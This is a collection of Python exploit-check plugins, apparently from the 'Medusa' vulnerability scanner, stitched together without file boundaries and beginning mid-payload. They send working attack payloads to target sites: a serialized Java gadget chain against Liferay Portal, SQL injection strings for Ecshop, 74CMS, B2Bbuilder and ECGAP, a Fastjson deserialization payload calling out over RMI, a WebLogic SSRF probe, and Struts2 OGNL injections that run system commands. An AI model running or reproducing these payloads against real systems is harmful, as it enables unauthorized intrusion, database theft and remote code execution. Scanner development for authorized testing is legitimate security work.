b'\xac\xed\x00\x05sr\x00=com.mchange.v2.naming.ReferenceIndirector$ReferenceSerializedb\x19\x85\xd0\xd1*\xc2\x13\x02\x00\x04L\x00\x0bcontextNamet\x00\x13Ljavax/naming/Name;L\x00\x03envt\x00\x15Ljava/util/Hashtable;L\x00\x04nameq\x00~\x00\x01L\x00\treferencet\x00\x18Ljavax/naming/Reference;xppppsr\x00\x16javax.naming.Reference\xe8\xc6\x9e\xa2\xa8\xe9\x8d\t\x02\x00\x04L\x00\x05addrst\x00\x12Ljava/util/Vector;L\x00\x0cclassFactoryt\x00\x12Ljava/lang/String;L\x00\x14classFactoryLocationq\x00~\x00\x07L\x00\tclassNameq\x00~\x00\x07xpsr\x00\x10java.util.Vector\xd9\x97}[\x80;\xaf\x01\x03\x00\x03I\x00\x11capacityIncrementI\x00\x0celementCount[\x00\x0belementDatat\x00\x13[Ljava/lang/Object;xp\x00\x00\x00\x00\x00\x00\x00\x00ur\x00\x13[Ljava.lang.Object;\x90\xceX\x9f\x10s)l\x02\x00\x00xp\x00\x00\x00\nppppppppppxt\x00\x03Expt\x00\x1b%st\x00\x03Foo' % DL.dns_host().encode('utf-8') data=str(binascii.hexlify(hex_data),encoding = "utf-8") post_data= """cmd={"/expandocolumn/update-column":{}}&p_auth=<validtoken>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:"""+data+""";"}""" resp=requests.post(payload_url,data=post_data,headers=headers, proxies=proxies, timeout=6, verify=False) if DL.result(): Medusa = "{}存在LiferayPortal远程命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\nPOST数据包:{}\r\n随机的DNSLOG:{}\r\n返回数据包:{}\r\n".format(url,payload_url,post_data,DL.dns_host(),resp.text) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url,Token).Write() # 传入url和扫描到的数据 WriteFile().result(str(url),str(Medusa))#写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 #medusa("http://192.168.183.143:8080/","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36","11","127.0.0.1:8080")
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/category.php?page=1&sort=goods_id&order=ASC%23goods_list&category=1&display=grid&brand=0&price_min=0&price_max=0&filter_attr=-999%20AND%20EXTRACTVALUE(1218%2cCONCAT(0x5c%2c0x716f776c71%2c(MID((IFNULL(CAST(md5(3)%20AS%20CHAR)%2c0x20))%2c1%2c50))%2c0x7172737471))' payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("cbc87e4b5ce2fe28") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/admin/shopinfo.php?act=edit&id=1 and updatexml(1,concat(0x7e,(md5(c))),0)" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select md5(c) from qs_admin),1,1))=97 as signed) %23" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find('4a8a08f09d37b73795649038408b5f33') != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() #DL="dsada11111sda.xhqp3u.dnslog.cn" data = '''{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://%s/Exploit","autoCommit":true}''' % DL.dns_host( ) Headers['Content-Type'] = 'application/json' Headers["Connection"] = "close" resp = requests.post(payload_url, headers=Headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 400: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001' payload_url = scheme + "://" + url + ":" + str(port) + payload resp = requests.get(payload_url, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200: Medusa = "{}疑似存在Weblogic服务器端请求伪造漏洞(CVE-2014-4210)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format( url, payload_url, con) if con.find("An error has occurred") != -1 and con.find( "Weblogic") != -1: Medusa = "{}存在Weblogic服务器端请求伪造漏洞(CVE-2014-4210)\r\n验证数据:\r\n漏洞位置:{}\r\n返回数据包:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ "/cmstop/apps/system/view/template/edit.php", "/apps/system/view/template/edit.php" ] for payload in Payloads: try: payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text if con.find(' in <b>([^<]+)</b> on line <b>(\\d+)</b>') != -1: Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None: proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/main.php?m=buy&s=admin/add_cat&id=111' payload_url = scheme + "://" + url + ":" + str(port) + payload data = "cat=1&pid=1 or updatexml(2,concat(0x7e,((select group_concat(user,0x5e,md5(c)) from hy_admin))),0) %23" resp = requests.post(payload_url, data=data, headers=Headers, proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1: Medusa = "{}存在B2BbuilderSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, data, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url,RandomAgent,proxies=None,**kwargs): proxies=Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port Payloads = [ "/Login/Log.aspx?loginname=", "/ViewSource/SrcWorkProgram.aspx?infoflowId=", "/OnlineQuery/GetFlowItem.aspx?DeptId=" ] for payload in Payloads: try: data = "%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--" payload_url = scheme + "://" + url +":"+ str(port)+ payload + data headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url,headers=headers,proxies=proxies, timeout=6, verify=False) con = resp.text code = resp.status_code if code==200 and con.find("81dc9bdb52d04dc20036dbd8313ed055") != -1 : Medusa = "{}存在ECGAPSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(url,payload_url,con) _t=VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = '''?debug=command&expression=(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean%28%22false%22%29%20%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%[email protected]@toString%[email protected]@getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%29)''' try: payload_url = scheme + "://" + url + ":" + str( port) + "/index.action" + payload headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-008-1\r\n返回数据:{}\r\n部署系统:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = '''?debug=browser&object=(%[email protected]@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an''' try: payload_url = scheme + "://" + url + ":" + str( port) + "/index.action" + payload headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-Devmode\r\n返回数据:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名